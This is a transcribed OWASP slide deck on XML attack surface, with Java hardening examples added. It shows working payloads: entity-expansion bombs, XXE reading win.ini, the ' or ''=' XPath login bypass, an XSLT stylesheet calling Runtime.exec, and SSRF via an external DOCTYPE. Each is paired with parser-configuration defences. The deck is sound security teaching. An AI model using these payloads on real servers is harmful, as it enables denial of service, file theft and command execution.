OWASP. XML Attack Surface. Business Analytics Security Competency Group
Slide 1: XML Attack Surface
Business Analytics Security Competency Group

Slide 2: XML is Pervasive

Slide 3: XML intro
- Born in 1998 (see initial specifications)
- Data interchange format
- Text based, human readable
- International languages support
- Parsers: DOM, SAX (rooted in Ottawa, see bio), StAX
- Complementary technologies and standards:
  - XML Validation (DTD, XSD, ...)
  - XML Transformation (XSLT)
  - XML Query (XQuery, XPath)

Slide 4: Is XML Secure?
- Nothing wrong with the standard itself
- Most vulnerabilities are due to:
  - libraries/tools misconfiguration
  - insufficient validation of untrusted input
- Known, reported security vulnerabilities (see CVE search)
Slide 5: XML Bomb
- CWE-776: Denial of service (memory exhaustion)
- Amit Klein, 2002 (see BugTraq)
- XML entity expansion

    <!DOCTYPE ibm [
      <!ENTITY ernst128 "pierre">
      <!ENTITY ernst    "&ernst128;&ernst128;">
      (intermediate declarations omitted on the slide)
      <!ENTITY ernst002 "&ernst003;&ernst003;">
      <!ENTITY ernst001 "&ernst002;&ernst002;">
      <!ENTITY ernst000 "&ernst001;&ernst001;">
    ]>
    <ibm>&ernst000;</ibm>

Each entity expands to two copies of the next one, so the single reference &ernst000; expands to 2^128 copies of "pierre".

Slide 6: Modus Operandi (sequence diagram)
- Attacker sends POST /request HTTP/... carrying <ibm>&ernst000;</ibm> to the vulnerable server
- The server's parser expands the reference step by step: <ibm>&ernst001;&ernst001;</ibm>, then <ibm>&ernst002;&ernst002;&ernst002;&ernst002;</ibm>, then eight &ernst003; references, and so on until memory is exhausted

Slide 7: Demo #1: Server Crash with XML Bomb (source code available on demand)
Slide 8: Variation: Quadratic Blowup Attack
- Amit Klein (see MSDN article)
- Uses one single entity of size 50KB
- References the entity 50,000 times
- Useful to bypass the FEATURE_SECURE_PROCESSING protection, which limits entity expansions to 100,000 (IBM) or 64,000 (Oracle)

    <!DOCTYPE pierre [
      <!ENTITY e "eeeeeeeeeeee...eeeeeeeee">
    ]>
    <pierre>&e;&e;&e;...&e;&e;&e;</pierre>

Slide 9: Protection
- DOM, SAX:
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
- StAX:
    factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
Slide 10: External Entity Reference (XXE)
- CWE-611: Information Disclosure
- Gregory Steuck, 2002 (see BugTraq)
- Requires the server to include user-supplied data in the response

    <!DOCTYPE pierre [
      <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">
    ]>
    <pierre>&ernst;</pierre>

Slide 11: Modus Operandi (sequence diagram)
- Attacker sends POST /request HTTP/1.1 carrying <pierre>&ernst;</pierre> to the vulnerable server
- The server's parser replaces &ernst; with the file, so the document becomes <pierre>[... content of the file on the server ...]</pierre>
- Server reply:
    HTTP/ OK
    Content-Type: text/xml
    <response>Unknown service [... content of the file on the server ...]</response>

Slide 12: Demo #2: File Content Disclosure with XXE (source code available on demand)

Slide 13: Protection
- DOM, SAX:
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
- StAX:
    factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
Slide 14: Blind XPath Injection (XML Injection)
- CWE-643: Abuse of Functionality
- Amit Klein, 2004 (see white-paper)
- User input is embedded as-is in the XPath statement

Users document:
    <users>
      <user>
        <name>pierre</name>
        <password>i8simon</password>
      </user>
      <user>
        <name>trevor</name>
        <password>mee2</password>
      </user>
    </users>

XPath statement built by the server:
    //users/user[name/text()='<name>' and password/text()='<password>']/name/text()

With the legitimate input pierre / i8simon (the password is masked on the form):
    //users/user[name/text()='pierre' and password/text()='i8simon']/name/text()

With the injected input ' or ''=' in both fields:
    //users/user[name/text()='' or ''='' and password/text()='' or ''='']/name/text()

Slide 15: Modus Operandi (sequence diagram)
- Attacker sends POST /login HTTP/... with the injected credentials
- The vulnerable server evaluates
    //users/user[name/text()='' or ''='' and password/text()='' or ''='']/name/text()
  which matches every user
- Server reply: HTTP/ OK, Content-Type: text/html, listing pierre and trevor

Slide 16: Demo #3: Blind XPath Injection (source code available on demand)

Slide 17: Variation: Read System Properties
- JAXP implementation: IBM, Oracle
- Interesting properties: os.version, user.name, java.class.path, sun.java.command
- XPath: system-property('sun.java.command')

Slide 18: Protection
- Input validation: [A-Za-z0-9_\-]+ in our example
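The spliced expression on slide 14 and the allowlist on slide 18, as an added Java example that is not from the talk: the vulnerable concatenation beside a hardened version that allowlists the name and then binds both values as XPath variables through an XPathVariableResolver, so the data can never change the shape of the expression. The users document is the one on the slide, embedded here as constructed input; the class and method names are my own.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathFactory;

import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

public class XPathLogin {

    // The slide's users document, constructed here as the sample input.
    static final String USERS =
          "<users>"
        + "<user><name>pierre</name><password>i8simon</password></user>"
        + "<user><name>trevor</name><password>mee2</password></user>"
        + "</users>";

    // Allowlist from slide 18.
    static final Pattern ALLOWED = Pattern.compile("[A-Za-z0-9_\\-]+");

    // Parse the store with DOCTYPE disallowed, as the talk's protection slides advise.
    static Document users() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return f.newDocumentBuilder().parse(new InputSource(new StringReader(USERS)));
    }

    static List<String> names(NodeList texts) {
        List<String> out = new ArrayList<>();
        for (int i = 0; i < texts.getLength(); i++) out.add(texts.item(i).getNodeValue());
        return out;
    }

    /** Vulnerable form from slide 14: input is spliced into the expression as-is. */
    public static List<String> loginVulnerable(String name, String password) throws Exception {
        String expr = "//users/user[name/text()='" + name
                    + "' and password/text()='" + password + "']/name/text()";
        XPath xp = XPathFactory.newInstance().newXPath();
        return names((NodeList) xp.evaluate(expr, users(), XPathConstants.NODESET));
    }

    /** Hardened form: allowlist the name (slide 18), then pass both values as
     *  XPath variables so quotes in the data stay data. */
    public static List<String> loginSafe(String name, String password) throws Exception {
        if (!ALLOWED.matcher(name).matches()) {
            return Collections.emptyList();        // rejected before any query is built
        }
        Map<String, String> vars = new HashMap<>();
        vars.put("name", name);
        vars.put("password", password);
        XPath xp = XPathFactory.newInstance().newXPath();
        xp.setXPathVariableResolver(q -> vars.get(q.getLocalPart()));
        String expr = "//users/user[name/text()=$name and password/text()=$password]"
                    + "/name/text()";
        return names((NodeList) xp.evaluate(expr, users(), XPathConstants.NODESET));
    }

    public static void main(String[] args) throws Exception {
        String inj = "' or ''='";                        // payload shown on slide 14
        System.out.println("valid login, vulnerable: " + loginVulnerable("pierre", "i8simon"));
        System.out.println("injected,    vulnerable: " + loginVulnerable(inj, inj));
        System.out.println("valid login, safe:       " + loginSafe("pierre", "i8simon"));
        System.out.println("injected,    safe:       " + loginSafe(inj, inj));
    }
}
```

The vulnerable path returns both users for the injected input because the predicate degenerates to `... or ''=''`; the hardened path returns an empty list for it even with the allowlist removed, since the bound variable is compared as a plain string.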
Slide 19: Code Injection during XSLT
- CWE-94: Improper Control of Generation of Code
- When the attacker can control the XML stylesheet applied to an XML document
- Uses the transformer engine's extension capabilities

    <xsl:stylesheet version="1.0"
        xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
        xmlns:rt="xalan://java.lang.Runtime"
        exclude-result-prefixes="rt">
      <xsl:template match="/">
        <xsl:variable name="obj" select="rt:getRuntime()"/>
        <xsl:value-of select="rt:exec($obj,'calc.exe')"/>
      </xsl:template>
    </xsl:stylesheet>

Slide 20: Modus Operandi (sequence diagram)
- Attacker sends GET /request?doc=...&stylesheet=... HTTP/..., where doc is <doc>whatever</doc> and stylesheet is the malicious stylesheet
- The vulnerable server loads the class java.lang.Runtime, then calls its exec() method

Slide 21: Demo #4: Remote OS Command Injection (source code available on demand)

Slide 22: Variation #1: Universal XXE
- Universal: you always see the entity in the response

    <!DOCTYPE xsl:stylesheet [
      <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">
    ]>
    <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
      <xsl:template match="/">
        &ernst;
      </xsl:template>
    </xsl:stylesheet>

Slide 23: Variation #2: Infinite Loop

    <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
      <xsl:template name="loop">
        <xsl:call-template name="loop"/>
      </xsl:template>
      <xsl:template match="/">
        <xsl:call-template name="loop"/>
      </xsl:template>
    </xsl:stylesheet>

Slide 24: Variation #3: Cross-Site Scripting (XSS)

    <xsl:stylesheet version="1.0"
        xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
        xmlns:xhtml="http://www.w3.org/1999/xhtml">
      <xsl:output method="html"/>
      <xsl:template match="/">
        <xhtml:script>alert('xss');</xhtml:script>
      </xsl:template>
    </xsl:stylesheet>

Slide 25: Protection
- There are several ways to abuse XML stylesheet transforms
- Users should never be able to use custom XML stylesheets
Slide 26: Server Side Request Forgery (SSRF)
- CWE-601: Open Redirect, but server-to-server
- Nathan Hamiel, Shawn Moyer, 2009 (ShmooCon)
- XML vectors:
  - XML External Entities (XXE)
  - XInclude
  - External DOCTYPE inclusion:
        <!DOCTYPE PIERRE PUBLIC "ernst" "[external URL, stripped from the transcription]">
        <pierre/>

Slide 27: Modus Operandi (sequence diagram)
- (1) Attacker sends to the vulnerable server:
    POST /request HTTP/1.1
    Content-Type: application/xml
    Content-Length: 666
    <?xml version="1.0"?>... whatever
- (2) While parsing, the vulnerable server issues a request of its own to the internal service

Slide 28: Protection
- DOM, SAX:
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
- StAX:
    factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);

Slide 29: Variation: Exotic Java URL Handlers
- Alexander Polyakov, Dmitry Chastukhin, Alexey Tyurin, 2012 (CVE)
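The protection slides for the XML bomb (slide 9), XXE (slide 13) and SSRF (slide 28) each show one factory call. The following added example, not from the talk, combines those settings for the JDK's JAXP DOM, SAX and StAX factories and checks that DOCTYPE-bearing documents are rejected; the feature URIs are the standard Xerces and SAX ones, the sample documents are constructed here (a three-level version of the slide's entity chain and the win.ini document from slide 10), and the class and method names are my own.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.stream.XMLInputFactory;

import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

public class HardenedXmlParsers {

    // Xerces feature: reject any <!DOCTYPE> outright. One switch removes internal
    // entity expansion (XML bomb), XXE and external DTD fetches (SSRF) together.
    static final String DISALLOW_DOCTYPE =
        "http://apache.org/xml/features/disallow-doctype-decl";
    // Defence in depth for a parser that does not honour the feature above.
    static final String EXTERNAL_GENERAL =
        "http://xml.org/sax/features/external-general-entities";
    static final String EXTERNAL_PARAMETER =
        "http://xml.org/sax/features/external-parameter-entities";
    static final String LOAD_EXTERNAL_DTD =
        "http://apache.org/xml/features/nonvalidating/load-external-dtd";

    public static DocumentBuilderFactory hardenedDom() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(DISALLOW_DOCTYPE, true);
        f.setFeature(EXTERNAL_GENERAL, false);
        f.setFeature(EXTERNAL_PARAMETER, false);
        f.setFeature(LOAD_EXTERNAL_DTD, false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);          // XInclude is one of the SSRF vectors on slide 26
        f.setExpandEntityReferences(false);
        return f;
    }

    public static SAXParserFactory hardenedSax() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature(DISALLOW_DOCTYPE, true);
        f.setFeature(EXTERNAL_GENERAL, false);
        f.setFeature(EXTERNAL_PARAMETER, false);
        f.setFeature(LOAD_EXTERNAL_DTD, false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        return f;
    }

    public static XMLInputFactory hardenedStax() {
        XMLInputFactory f = XMLInputFactory.newInstance();
        // StAX has no disallow-doctype-decl; switching off DTD support (slide 28)
        // and entity replacement (slide 9) is the closest equivalent.
        f.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        f.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
        return f;
    }

    /** True when the hardened DOM parser refuses the document. */
    public static boolean domRejects(String xml) throws Exception {
        try {
            hardenedDom().newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXParseException e) {
            return true;   // Xerces reports that DOCTYPE is disallowed by the feature
        }
    }

    /** True when the hardened SAX parser refuses the document. */
    public static boolean saxRejects(String xml) throws Exception {
        try {
            hardenedSax().newSAXParser()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)),
                       new DefaultHandler());
            return false;
        } catch (SAXParseException e) {
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed samples, not the talk's demo files.
        String bomb = "<!DOCTYPE ibm [<!ENTITY e2 \"pierre\">"
                    + "<!ENTITY e1 \"&e2;&e2;\"><!ENTITY e0 \"&e1;&e1;\">]>"
                    + "<ibm>&e0;</ibm>";
        String xxe  = "<!DOCTYPE pierre [<!ENTITY ernst SYSTEM "
                    + "\"file:///c:/windows/win.ini\">]><pierre>&ernst;</pierre>";
        String benign = "<pierre>hello</pierre>";
        System.out.println("bomb   rejected (DOM/SAX): " + domRejects(bomb)   + "/" + saxRejects(bomb));
        System.out.println("xxe    rejected (DOM/SAX): " + domRejects(xxe)    + "/" + saxRejects(xxe));
        System.out.println("benign rejected (DOM/SAX): " + domRejects(benign) + "/" + saxRejects(benign));
    }
}
```

Both DOCTYPE-bearing documents fail at the prolog, before any entity is expanded or any file is opened, while the benign document still parses; this is the "clients should not define the grammar of the request" point from the conclusions.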
Slide 30: Conclusions
- Always configure your XML parsers to disallow DOCTYPE. From a server's perspective, clients should not be able to define the grammar of the request anyway.
- The Secure Processing flag is not enough
- Preventing external entity expansion is not enough
- XPath: validate the user's input
- XSLT: avoid at any cost
- Always apply Java patches from vendors

Slide 31: Pierre Ernst
- 10 years as Software Developer
- 5 years as Penetration Tester
- 750+ vulns
- Manual code review, manual black box testing
- Java, XML, Open Source
- pierre.ernst@gmail.com

Slide 32: Questions & Answers